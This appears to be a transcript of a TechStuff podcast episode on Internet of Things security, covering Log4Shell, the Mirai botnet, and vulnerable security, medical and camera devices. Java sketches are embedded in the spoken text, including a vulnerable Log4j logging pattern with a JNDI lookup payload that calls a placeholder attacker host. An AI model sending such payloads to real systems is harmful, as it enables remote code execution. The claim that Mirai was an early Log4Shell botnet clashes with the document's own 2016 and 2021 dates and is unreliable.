Speaker 1: Welcome to TechStuff, a production from iHeartRadio.

Speaker 1: Hey there, and welcome to TechStuff. I'm your host, Jonathan Strickland. I'm an executive producer with iHeartRadio, and how the tech are you? All right. Way back in 1961, a guy named Leonard Kleinrock wrote a paper titled "Information Flow in Large Communication Nets," and a lot of folks point to this paper as laying out the basics for what would become networked computer communications, which in turn would evolve into the ARPANET project, where the basic rules for computer-to-computer communication were established. And then you had things like radio-based networks, you had satellite-based networks. You had these all kind of coming together. And from that we then get an evolution into the Internet, which is the network of networks, and that really got its start around 1983, as different networks could finally communicate with one another, not just within themselves, and it was because of the establishment of common protocols. Now, many of us out in the real world, away from all these different research centers and government facilities and things like that, remained blissfully ignorant of the Internet until you got up to the early nineties and the launch of the World Wide Web. The Web was an easier concept for most people to grasp than the larger idea of the Internet, because you could look at the Web and say, oh, it's like a magazine, but it's on your computer. It also wasn't that different from online service providers like AOL, where you weren't connected to an internet at large but were connecting into a single network. And for a lot of people, the Web and the Internet were synonymous, right? The Web was the Internet. Over time, I would say the general public came to understand what the Internet was, at least sort of. I mean, there are still people who refer to the Web as the Internet and the Internet as the Web, and that's all there is to it.
Speaker 1: That's not the case. The Web sits on top of the Internet, but the Internet is more than just the Web. But then let's get up to the late nineties. That's when there was this guy working at Procter & Gamble who had an idea: he proposed putting RFID chips on components and products for the purpose of tracking stuff as it moves through the supply chain. So an example of this might be a microchip that's going to go into a larger product. Maybe the box that holds the little microchip has an RFID tag on it so that you can easily scan it as it goes from one point in the supply chain to the next. That way, you can keep track of where everything is throughout the entire system. And that was a neat idea, right? It's a great way to keep an eye on and monitor a supply chain, to give a logistics manager the capability to know what's going on at any given minute and respond to it, perhaps make changes if there is a delay at one point in the supply chain. Great idea. But this guy wanted to be able to convince his superiors to buy into it. The guy's name is Kevin Ashton, and Kevin Ashton thought he needed kind of a sexy phrase to get his idea sold to these higher-ups, to get them to buy into his vision. So he called the approach "the Internet of Things." Now, Ashton was allegedly just trying to get higher-ups to support his idea for including RFID tags, and those tags wouldn't magically send information on their own to a network; you'd have to scan them and everything. But it wouldn't take long for this basic concept to evolve. And in fact, there were previous cases where people had connected sensors to certain devices and then connected those to a network so that they could monitor a device remotely.
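To make that tracking idea a little more concrete, here is a minimal, hypothetical sketch of what RFID-based supply chain visibility boils down to in code: every scan reports a tag ID and a checkpoint, and a simple map remembers where each tagged item was last seen. The class, tag IDs, and checkpoint names are made up for illustration; this is not anything Ashton or Procter & Gamble actually built.

```java
import java.time.Instant;
import java.util.HashMap;
import java.util.Map;

// Hypothetical sketch: track the last known location of each RFID-tagged item.
public class SupplyChainTracker {
    // One scan event: which tag was read, where, and when.
    record ScanEvent(String tagId, String checkpoint, Instant seenAt) {}

    private final Map<String, ScanEvent> lastSeen = new HashMap<>();

    // Called whenever a reader at some checkpoint scans a tag.
    public void recordScan(String tagId, String checkpoint) {
        lastSeen.put(tagId, new ScanEvent(tagId, checkpoint, Instant.now()));
    }

    // A logistics manager's view: where was this item last scanned?
    public String whereIs(String tagId) {
        ScanEvent e = lastSeen.get(tagId);
        return e == null ? "never scanned" : e.checkpoint() + " at " + e.seenAt();
    }

    public static void main(String[] args) {
        SupplyChainTracker tracker = new SupplyChainTracker();
        tracker.recordScan("TAG-0042", "supplier warehouse");
        tracker.recordScan("TAG-0042", "distribution center");
        System.out.println(tracker.whereIs("TAG-0042")); // last seen at the distribution center
    }
}
```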
Speaker 1: People did that kind of remote monitoring with vending machines, for example, so that they would know when the vending machine was running low on specific stuff, or in some cases so that the person who had installed it would know, oh, I'm not going to bother walking down there, they're out of Dr Pepper. I'm not even going to leave my desk, because I know there's no Dr Pepper in the vending machine downstairs. But it didn't take long for this basic concept to evolve into something more ambitious. And I think it's fascinating that the phrase "Internet of Things" actually predates the consumer smartphone era by nearly a decade, because I think for most people, myself included, their awareness of the Internet of Things came after smartphones first started to really become popular among the general population. I point to the iPhone launch in 2007 as the beginning of the smartphone era. Obviously there were smartphones before the iPhone; Apple did not invent the smartphone. But smartphones were kind of a niche product that were mostly used by business leaders, executives, that kind of thing, and not so much the average person. Apple changed all that, and subsequently we all adjusted to the idea of being able to access stuff online through our phones in a way that was actually, you know, fun to do and useful. Because if you ever had a basic cell phone before the smartphone era, you know that if you did have any web-enabled services on there, it was not good. It just didn't work well; it wasn't easy to navigate in. The iPhone changed all that. Well, for me at least, my awareness of smartphones came first, and then I later became aware of this idea of the Internet of Things. But of course the Internet of Things concept had been going pretty strong already for almost a decade.
Speaker 1: Anyway, as time went on, we would see more folks experiment with Internet connectivity in everything from components like simple sensors or actuators that could go into larger systems, so you make a tiny part that is meant to go into something else, make that one part capable of connecting to a network, and then maybe the rest of it can too, all the way up to more complicated integrations where the entire system is meant to be Internet capable, stuff like smart TVs. Right? These days you can outfit your home with numerous smart devices that all connect to a home network or the Internet at large. And then there's also a growing use of Internet-connected devices out in the world, just outside of your home: everything from cars to city infrastructure to security cameras, all sorts of stuff connected to the Internet, creating this massive Internet of Things. Now, throughout all that time, there have been security experts who have cautioned companies and consumers about the Internet of Things. Because the Internet of Things does come with a lot of benefits; you can see a lot of really compelling use cases for it, whether it's just keeping an eye on things to make sure everything is working properly or creating more convenient and delightful experiences. But any network-connected device can potentially serve as an entry point for bad actors, for malicious hackers. So devices can be compromised, and that might allow a hacker to get a foothold into, say, your home network and search for ways to get greater access, so that they can do all sorts of stuff, from stealing information to turning your network, or devices on your network, into agents they use in things like a botnet, or they may use it to do stuff like mine for cryptocurrency.
Speaker 1: There's nothing quite like having your web server crash because some hacker has compromised tens of thousands of Internet-connected doorbells and then directed all those doorbells to ping your web server. That's something that can happen: botnets like that can do distributed denial of service attacks, or DDoS attacks. It doesn't have to be a computer; I often think of computers when I think of DDoS attacks, but the truth is any network-connected device capable of sending a ping to a server can potentially be part of a botnet. So that includes a lot of devices we connect to networks that are not computers or smartphones. And if those devices don't have the proper security enabled on them, or if we're really lazy and don't bother to update things like default passwords and usernames, we can start to create the opportunity for some pretty serious mischief. Then, of course, there are the tens of thousands of devices that have been connected to the Internet, where the companies responsible for the hardware, or for the services that run on the hardware, have subsequently stopped supporting them or completely gone out of business. This happens all the time, right? We've got all these different companies that have created Internet of Things-type devices, or components for devices, and then the company gets acquired and, effectively, services are no longer supported for some things. Well, if those devices are still connected to networks and they're no longer actively serving a purpose, they could potentially act as an entry point for hackers as well, especially if they use default usernames and passwords, default login credentials, because you no longer have a company that's actively pushing out updates, so there's no hope of someone sending out, say, a firmware update that requires you to change your device's login credentials.
Speaker 1: So if you've got these orphaned devices that are still connected to networks, they can serve as a point of entry for hackers, these forgotten Internet of Things devices. In some cases, forgotten can also just mean that you connected this thing to your network, you forgot you did it, and you haven't used it in ages. It's still technically connected and still active, but you're not constantly using it. That can potentially become a vulnerability. This is really one of the big problems with the Internet of Things in general: the Internet of Things as a concept depends heavily upon companies that create Internet of Things products and services remaining solvent and actively supporting them, and, if they stop supporting them, upon the rest of us taking the effort to remove those devices from our networks, because they now constitute a threat to our security. That's something we're not very good at doing yet. I'll explain a bit about some examples of where that all went wrong after we come back from this quick break.

Speaker 1: So I thought I would chat about some of the instances where hackers were able to exploit Internet of Things devices. This isn't to warn everyone away from IoT. It's rather to remind ourselves that good security goes beyond resetting our router passwords or our modem login credentials, and that it goes beyond being savvy with our computer security and avoiding things like phishing attacks and that sort of stuff. All of that is important, and I think it still remains true that in your typical system the weakest point is usually the people, not the systems, not the components. But that doesn't mean all components are bulletproof. And if there are vulnerabilities and the hacker community learns about them, that information can spread quickly in hacker circles, and it may not get to anyone who can do anything about it until it's too late.
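As a concrete, defensive illustration of the default-credentials problem just described, here is a small sketch that walks a home subnet and flags devices still answering on telnet (port 23), a classic sign of IoT gear that may be sitting behind factory-default logins. The subnet prefix and timeout are assumptions; adjust them for your own network, and only ever scan networks you own.

```java
import java.io.IOException;
import java.net.InetSocketAddress;
import java.net.Socket;

// Hedged sketch: flag devices on your own subnet that expose telnet (port 23),
// a common leftover on IoT gear that still uses factory-default credentials.
public class TelnetAudit {
    public static void main(String[] args) {
        String prefix = "192.168.1.";   // assumption: change to match your own subnet
        int port = 23;                  // classic telnet port
        for (int host = 1; host <= 254; host++) {
            String address = prefix + host;
            try (Socket socket = new Socket()) {
                socket.connect(new InetSocketAddress(address, port), 200); // 200 ms timeout per host
                System.out.println(address + " answers on telnet; check whether its credentials were ever changed");
            } catch (IOException ignored) {
                // nothing listening (or the port is filtered), move on to the next address
            }
        }
    }
}
```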
Speaker 1: You know, any time we're talking about adding components to a network, we need to think about security. I mean, I've been guilty of this too. I've added stuff to my home network and then later thought, oh, you know what, this thing that I just connected to my home network has a default username and password that I can't change, and I bet there are people out there who know what the default username and password happens to be for this particular device. I should just disconnect it from the network and not use it. And that's what I've done, sometimes not immediately; sometimes it's only after reflection. Luckily, as far as I know anyway, I've never been the target of a true intrusion. But it's not because I was careful enough. It's because I was lucky. And you can't count on that. And I'm saying this out loud so that I remember I can't count on that. So yeah, if we don't take the right steps, it's not that I would say we're inviting trouble, but we're certainly going to be underprepared if trouble happens to find us.

Speaker 1: So let's begin with a big instance of a problem that affected more than just the Internet of Things category of technology, though IoT is certainly part of it. And it requires a bit of an explanation. One thing that a lot of different systems, including a lot of IoT devices, tend to do is log; it's called logging. And no, I don't mean that IoT devices are all putting on flannel and singing about being a lumberjack (and that's okay). In this case, logging means keeping a record of activity. So there are lots of systems out there that log stuff, and that makes sense, right? There are some systems that are designed to log something, and that's all they're meant to do. Like, let's say that you've got some environmental sensors set up in an area. They might be intended to log changes in things like temperature. Well, that's the whole purpose of that device.
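To picture what logging looks like in practice, here is a minimal sketch of an environmental sensor recording temperature readings through a logging library. It happens to use the Apache Log4j 2 API, which comes up again in a moment, and it assumes the log4j-api and log4j-core jars are on the classpath; the sensor values are obviously invented.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Minimal sketch: a device whose whole job is to log readings, here via the Log4j 2 API.
public class TemperatureSensor {
    private static final Logger LOG = LogManager.getLogger(TemperatureSensor.class);

    public void report(double celsius) {
        if (celsius > 40.0) {
            // An error-level event a technician can find later when diagnosing problems.
            LOG.error("Temperature out of range: {} C", celsius);
        } else {
            LOG.info("Temperature reading: {} C", celsius);
        }
    }

    public static void main(String[] args) {
        TemperatureSensor sensor = new TemperatureSensor();
        sensor.report(22.5);  // routine reading
        sensor.report(45.1);  // out of range, logged at error level
        // With Log4j's default configuration, only the error-level entry prints to the console.
    }
}
```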
Speaker 1: But even beyond that, systems that aren't primarily about logging typically do have some form of logging capability. So you have Internet devices that are part of larger systems that are tracking changes, or you've got a logging system that logs performance information so you know how well your system is performing: is it running hot, is it efficient? You have error logging systems so that whenever anything goes askew, if something does not perform to expectations, you get a logged event. That way a technician can later go back and see what the heck happened, how can we fix it and make sure it doesn't happen again, so that it doesn't interrupt service or worse. You can log security status, all sorts of things like this. It's essentially standard to have some means of logging errors, because if you don't have a way of logging errors, then when something goes wrong it becomes like a murder mystery to figure out what the heck happened. Did it in fact go wrong, or did the end user misuse the technology and misunderstand it? So you want to have that logging feature to be able to diagnose problems much more quickly and then get to a solution. One set of logging tools, a library set that's heavily used throughout technology, comes from Apache, the Apache Software Foundation. Jump on it. Apache's software is used by a lot of high-profile systems. Cloudflare, for example, uses it, and Cloudflare, among other things, provides protections against denial of service attacks. But it's also used by stuff like Steam and Twitter. And Apache had a tool called Log4j. What wasn't really known was that, at least as far back as 2013, there was a vulnerability in Log4j that would allow for remote code execution, or RCE. And that is just what it sounds like.
Speaker 1: It's a capability that lets someone run code on a system from a remote location, so you can control a system as if you were right there with full access, or maybe not full access, but with access. You might actually build this into a system on purpose, right? You might want to have remote operators able to access a system. But it can also be a vulnerability: it could be something that you've overlooked, where someone has figured out a way to execute code on a system that they otherwise should not have access to. And that was the problem with Log4j. You might wonder what specifically was going on, how did this happen, what was happening on a technical level? So I'll try to explain it from a high viewpoint. The Log4j tool uses the Java Naming and Directory Interface, or JNDI. Someone trying to take advantage of this vulnerability in Log4j would send a special HTTP, or even HTTPS, request to a target server, a request that included a JNDI lookup in its header. The target server would receive this and likely log the request as an error using Log4j. Log4j, while logging the error, sees that there's this JNDI lookup in the header of the request that was sent, and so essentially it reaches out to the server that sent the request in the first place, the hacker's server. So this is kind of like someone saying, hey, can I help you? I see that you're having some issues. Only it's a trap, as Admiral Ackbar would say. The hacker's server then redirects this request from the target; you know, the target is saying, hey, how can I help?
Speaker 1: The hacker's server would direct that request to a directory containing malicious code, and when the Log4j system continued this process, it would activate that malicious code, which would then run on Log4j's target system and create a backdoor access point for hackers. So if you've seen Thor: Ragnarok, this is the classic "Get Help" routine. That's essentially what the Log4j vulnerability allowed hackers to do. It was like saying, something has gone wrong, Log4j is looking into it, and the process gets trapped into running this malicious code. It didn't work all the time, because obviously the server you're targeting had to rely on Log4j in the first place for this vulnerability to be relevant. But this vulnerability in Log4j persisted across several versions. Every time Apache shipped a new version of Log4j, the vulnerability was kind of baked in, and no one knew about it, so it just stayed there, version after version. Apparently no one at Apache had noticed it, and no one outside of Apache had alerted them to it. That changed on December 9, 2021. So remember, this vulnerability may have been around since 2013, and it wasn't until then that someone outside the hacker community figured it out. That was when a security engineer named Chen Zhaojun, who worked at the Chinese company Alibaba Cloud, sent Apache a notification saying, hey, Log4j has this critical vulnerability in it. As another side note, Alibaba Cloud actually got into hot water for that, because the Chinese government was mightily miffed that it was not informed of the vulnerability before Apache was told. And that sounds a little scary.
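To put the mechanism just described into code, here is a hedged sketch of the vulnerable pattern as it existed in Log4j 2.0 through 2.14.x (CVE-2021-44228): an application logs an attacker-controlled value, and the library expands the ${jndi:...} lookup buried inside it. The handler shape and the attacker.example.com address are illustrative only; the point is that merely logging untrusted input was enough, and patched versions no longer perform these message lookups.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hedged sketch of the Log4Shell pattern on vulnerable Log4j 2.0-2.14.x builds.
// The web-handler shape is hypothetical; the dangerous part is logging untrusted input.
public class LoginHandler {
    private static final Logger LOG = LogManager.getLogger(LoginHandler.class);

    public void handleFailedLogin(String userAgent) {
        // On vulnerable versions, Log4j scans the formatted message for ${...} lookups.
        // If userAgent is "${jndi:ldap://attacker.example.com/x}", the library performs a
        // JNDI/LDAP lookup against that server, which can hand back a reference that leads
        // the JVM to fetch and run remote code. Patched versions skip these lookups entirely.
        LOG.error("Failed login, User-Agent: {}", userAgent);
    }

    public static void main(String[] args) {
        LoginHandler handler = new LoginHandler();
        handler.handleFailedLogin("Mozilla/5.0"); // a normal value is harmless
        handler.handleFailedLogin("${jndi:ldap://attacker.example.com/x}"); // the payload shape attackers sent
    }
}
```

Running this against a patched Log4j build simply logs the literal string, which is exactly the fix.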
Speaker 1: I mean, maybe the Chinese government was upset because it wanted the opportunity to address the vulnerability in its own systems, since Log4j is used so widely, and maybe the thinking was, well, because you told Apache, now there's this window where attackers could attack our systems. Or maybe it implies that the Chinese government would have preferred to keep the vulnerability secret and potentially use it as an exploit themselves. But whatever the case, the Log4j tool was and is used all over the world, and this vulnerability affected any system that used the specific versions of Log4j that contained it, even if those systems were just using Log4j to log errors so that technicians could diagnose system problems. Anyway, once word got out, there was a scramble to patch systems that were using affected versions of Log4j. And if you were tuned into network security late in 2021 and early in 2022, you probably heard about the Log4Shell exploit. That was the exploit that would allow someone to penetrate a system by exploiting this vulnerability and then run whatever code they wanted. And it was, and is, a huge issue. In fact, hackers have exploited the Log4Shell vulnerability to build botnets. Early ones include one called Mirai, which was perpetuated in various ways, though the Log4j exploit was a big one, and another one called Muhstik. And when we come back, I'm going to talk a little bit more about Mirai, plus some other IoT vulnerability issues that we've seen. But first let's take another quick break.

Speaker 1: So back in 2016, the Mirai botnet consisted of thousands of IoT devices, and it was perpetuated in a couple of different ways, one of them through malware. When a computer got infected by this particular kind of malware, it would immediately start a search for IoT devices that could also be infected and added to the botnet.
Speaker 1: So one thing it was essentially doing was making a computer detect IoT devices and then use the default usernames and passwords that manufacturers had set for those devices to try and add them to the botnet. And because it can sometimes be impossible to change the default login credentials, like there just isn't a way, at least not an easy way, for the average person to make those changes, or a lot of people just don't bother to do it even if there is a way, that meant these devices were readily available to be added to botnets. Stuff like DVR players was compromised and joined this botnet army, and the Mirai botnet launched a massive DDoS attack in 2016. You might even remember it. This was the one that did some pretty big damage; I guess damage is the wrong word, but it definitely brought stuff down for several hours. That included services like Reddit, Twitter, and Netflix, and outlets like CNN and The Guardian were affected, among others. According to A10 Networks, the hacker group Charming Kitten out of Iran leaned on the Log4Shell exploit we were talking about before the break; they used that same exploit to launch attacks against Israeli servers, including ones belonging to the Israeli government. And while companies have been rolling out patches to their products that feature Log4j, the fact that this was a widely dispersed tool and library set means it's very tricky to resolve. Imagine it's something that's been spread throughout the world, and then years later you find out, oh shoot, it's got this fatal flaw in it that we didn't know about, and everybody's got one. Now how do you get the message out so that anyone affected can take steps to get rid of that thing? That's kind of where we are now. I mean, the big companies started rushing out patches right away.
Speaker 1: These were companies that had built Log4j into lots and lots of different products, but smaller companies may still be struggling to fix it. And, you know, it's just a tough situation. I liken it to being aboard an enormous ship that has thousands of tiny holes in the hull: you're patching holes and patching holes and patching holes, and there always seem to be more. That's kind of where we're at now. And in case you're wondering, some of the compromised systems are engaged in these sorts of DDoS botnet attacks, and some of them are being put to work mining cryptocurrency. So yeah, fun times. While there are steps that companies and even network administrators can go through to help eliminate risk with Log4j, it requires a lot of effort. And for any systems out there that are orphaned, or that are part of an organization that just lacks the resources to address problems like this, it means there remain vulnerable points within various systems, and hackers will continue to probe for them.

Speaker 1: But let's talk about an IoT device that was made to give you greater security, yet in fact brought with it a big security vulnerability. A company called Trend Micro has a product called the Home Network Security Station. This device connects to home routers, and what it's supposed to do is scan for activity. It's supposed to alert you to any possible network intrusions; in other words, if someone is trying to gain unauthorized access to your network, it's supposed to give you an alert. It's also supposed to give you a centralized point where you can change access settings on network devices, so you can, you know, revoke permissions for devices so that they can no longer access your network, that kind of stuff, which is legitimately a useful tool to have in your arsenal.
Speaker 1: However, when they first started shipping this product, it had some bugs in it that created potential attack vectors. Researchers at Cisco Talos uncovered these problems. There were three of them. One was that one of the components inside the device used a hard-coded password, and as that phrase suggests, this is when you've got a predetermined password that's hard-coded into a system at some level. You know, systems are made up of lots of different components, and sometimes just an individual component can have a hard-coded password. That alone can be a vulnerability, because if a hacker knows or can guess that hard-coded password, they can potentially exploit that component first and then perhaps escalate that into getting control of more of the system. This process of a hacker establishing an attack point and then using it to gain more purchase is called privilege escalation in network security settings. The goal is to obtain the highest level of access across the broadest spectrum of systems you can, and it all starts somewhere, including these smaller components that have a hard-coded password associated with them. This, by the way, is why it is a good idea to change the default password on your various devices if you can, because there are hackers out there who maintain enormous databases of login credentials for lots of different network components. Anyway, the researchers at Cisco Talos found, in addition to the hard-coded password, two other vulnerabilities that allowed for this privilege escalation, and together that marked a really bad vulnerability. But the Cisco Talos researchers alerted Trend Micro, and Trend Micro was able to send out an update to connected systems that helped fix the problem, so they were able to patch out those vulnerabilities. And the good news is that while the vulnerability could have potentially handed hackers access to affected systems, there were no attacks found in the wild.
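Since the first of those bugs was a hard-coded password, here is a small sketch of what that anti-pattern looks like next to one safer alternative, a per-device secret set at provisioning time. The class name, password string, and environment variable are hypothetical stand-ins, not anything from the actual product.

```java
// Hypothetical sketch of the hard-coded-password anti-pattern and one safer alternative.
public class ComponentAuth {

    // Anti-pattern: the secret ships inside the firmware, identical on every unit.
    // Anyone who extracts or guesses it once can authenticate to every device in the field.
    private static final String HARD_CODED_PASSWORD = "support123";

    public static void main(String[] args) {
        System.out.println("Anti-pattern secret shared by every unit: " + HARD_CODED_PASSWORD);

        // Safer: pull a per-device secret from configuration set at provisioning time,
        // so compromising one device tells an attacker nothing about the others.
        String provisioned = System.getenv("DEVICE_ADMIN_PASSWORD"); // hypothetical variable name
        System.out.println(provisioned == null
                ? "No per-device password provisioned yet"
                : "Per-device password loaded from provisioning config");
    }
}
```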
Speaker 1: So it looks like this vulnerability was found and mitigated without anyone in the hacker community being aware of it, so no one was able to take advantage of it before that door was shut. That's a good story there. All right, well, that's an example of an IoT device meant to secure your network where the device itself ends up having vulnerabilities in it. But what about a device that's meant to keep you alive? That's a big old yikes. And yeah, back in 2017, CNN reported that the FDA had discovered that implantable cardiac devices from St. Jude Medical had some vulnerabilities in them, meaning that devices intended to stimulate a person's heart so that it continues beating could possibly be hacked. And this is kind of getting into science fiction dystopian horror story territory here. The FDA said that a hacker could use a transmitter that would normally perform a scan of cardiac devices, one intended to give physicians information about how a patient is doing remotely, but instead the hacker could use that transmitter to potentially drain a cardiac implant's battery or change the pace of stimulation, which could obviously lead to disastrous results. St. Jude Medical swiftly got to work patching the vulnerabilities, so they fixed the problem. But when you're talking about devices, especially ones that have already been implanted in patients, devices that are meant to help keep people living a healthy life, well, stuff gets complicated. You can't just push out a firmware update to someone's heart. You know, if you have to reboot your router after a firmware update, that's usually not a big deal; at most it's a minor inconvenience. But when you're talking about a device that regulates heartbeat, implementing a patch could cause an interruption of service, and in this case that service can be critical.
Speaker 1: To that end, officials urged physicians to be cautious before they installed patches to patients' cardiac implants, because there's a risk that something could go wrong in that process, including the loss of functionality from the device, and you clearly don't want to create a medical emergency while you're trying to prevent a hypothetical future one. So yeah, that was a really bad instance of vulnerabilities. It's legitimately terrifying, and it reminds us that the Internet of Things vision has undeniable benefits, I mean, even in that case, right, a physician being able to monitor patients remotely, that's incredible. It could mean the difference between someone suffering a cardiac event and having it prevented, and that has a tremendous effect on that person's quality of life. So that is something to be wished for, something we should strive for. But we also have to keep in mind that whenever we're talking about connectivity, there are risks that come with it, and it means we need to really search out vulnerabilities in these products before they get to the shipping process, which is easier said than done. Companies have limited resources; it is very difficult to suss out any and all vulnerabilities in some cases, and once a product is released to the world, you've got the resources of the entire world that could potentially look into it and find vulnerabilities. So I don't want to put a lot of blame and unfair burden on companies that have released things that have had vulnerabilities in them. In some cases it's not even their fault; it's because they incorporated a component that came from a different company, and that OEM was the source of the vulnerability.
Speaker 1: But no matter where you want to place the blame, the end result is that we need to be able to identify these vulnerabilities quickly, address them, and preferably prevent them from ever getting out there in the first place, making sure that the shipped product is as secure as possible so that we can enjoy the benefits without the risk of these security vulnerabilities. There are some other examples we can talk about. There was the example of hackers getting access to IoT devices from TRENDnet. This is a company that, ironically enough, produces Internet-connected security systems. They had this one webcam they were marketing in the early twenty tens, either as a home security system or as a baby monitoring system. But there was a major problem: essentially, for a stretch of time, these specific web-based cameras would allow anyone who had the IP address for that camera to look at the feed. That's it. All you needed was the IP address. If you had the IP address, you could see whatever that camera could see. And that's an enormous invasion of privacy, right? If someone gets hold of that IP address and they wouldn't normally have access to the camera, that's phenomenally bad. But then TRENDnet also had a really bad habit of doing things like transmitting user login credentials in plain text over the Internet, which means anyone snooping on any of that communication would see plain-text login credentials. Not a secure way of doing things. The FTC brought an enforcement action against TRENDnet, the company reached a settlement the following year, and TRENDnet still operates to this day. But now they take steps to protect all of these things so that they are not massive security vulnerabilities. So they did take steps to address those problems and fix them going forward.
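As a footnote on the plain-text credentials problem, here is a hedged sketch of why the transport matters: a Basic auth header is only Base64-encoded, not encrypted, so sending it over plain http:// exposes it to anyone on the path, while https:// wraps the whole request in TLS. The host name and credentials below are placeholders.

```java
import java.net.URI;
import java.net.http.HttpRequest;
import java.util.Base64;

// Sketch: Basic auth is only Base64-encoded, so the URL scheme is what actually protects it.
public class CameraLogin {
    static HttpRequest loginRequest(String baseUrl, String user, String password) {
        String credentials = Base64.getEncoder()
                .encodeToString((user + ":" + password).getBytes());
        // Over plain http:// this header crosses the network as readable text for anyone snooping.
        // Over https:// the whole request, header included, travels inside a TLS tunnel.
        return HttpRequest.newBuilder(URI.create(baseUrl + "/feed"))
                .header("Authorization", "Basic " + credentials)
                .GET()
                .build();
    }

    public static void main(String[] args) {
        // Placeholder host and credentials, for illustration only.
        HttpRequest request = loginRequest("https://camera.example.com", "admin", "s3cret");
        System.out.println("Scheme in use: " + request.uri().getScheme()); // should always be https
        // To actually send it: HttpClient.newHttpClient().send(request, HttpResponse.BodyHandlers.ofString());
    }
}
```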
Speaker 1: But this is the sort of stuff we have to be aware of. You know, any time you want to think about smart systems, whether you're talking about your home or an office, or you're looking at smart connected vehicles, it's good to do the research and look into things like: what does the security community say about this stuff? Are there any alerts about it? Should I be concerned before I connect it? Are there things like login credentials or network access features I need to know about? Are there steps I need to take in order to change default passwords? These are all important steps. And I know it sounds like a lot, and I know it also may sound like, well, what's the likelihood that I'm going to be targeted? But if we look back to that Mirai example, the Mirai malware and botnet, you know, that doesn't mean you were a target in a hacker's eye. It's not like the hacker saw you and said, oh, I'm going to see if this person's network security is up to speed. That was malware that was automatically making computers scan for other devices that could potentially be compromised. When you've automated that and created malware that spreads this way, where it gets increasingly more powerful and more prevalent in an area, you don't need to be anyone special to get targeted. It just can happen. So it's important to keep all that in mind whenever we're thinking about the Internet of Things. I really like the vision of the Internet of Things. I like the potential benefits, but I also worry about rushing into implementations without properly giving security and privacy a lot of consideration.

Speaker 1: Okay, that wraps up this episode of TechStuff. That's the show I'm doing right now, right? Yes, TechStuff. If you have suggestions for future topics or questions or anything like that, there are a couple of different ways you can get in touch with me. One is to download the iHeartRadio app. It's free to download, free to use.
Speaker 1: You can navigate over to TechStuff by typing that into the little search engine and pop on over to the podcast page. You'll see that there is a microphone icon. If you hold that down, you can leave a message up to thirty seconds in length, and let me know if you would like me to play it in a future episode. I don't have to; I'll only play it if you tell me to. But yeah, that's one way to ask questions. Another is to go on Twitter. The handle for the show is TechStuff HSW, so you can use that to get in touch with me. A couple of you have been asking if I'm on Mastodon for TechStuff. I am not, not yet, but I will be looking into that this week to see if I can use that as another way of contacting me. One last thing: on Wednesday we will be playing an episode of The Restless Ones here in the TechStuff feed. The Restless Ones is an interview show that I host where I talk to leaders in technology departments at big companies, and it's a fun show about leadership and technology and the benefits of networks. So I hope you will enjoy that, and I just wanted to give a shout-out so that you're not surprised when it happens on Wednesday. It's totally planned, supposed to happen. That's it. I hope you're having a great start to your week so far, and I'll talk to you again really soon.

Speaker 1: TechStuff is an iHeartRadio production. For more podcasts from iHeartRadio, visit the iHeartRadio app, Apple Podcasts, or wherever you listen to your favorite shows.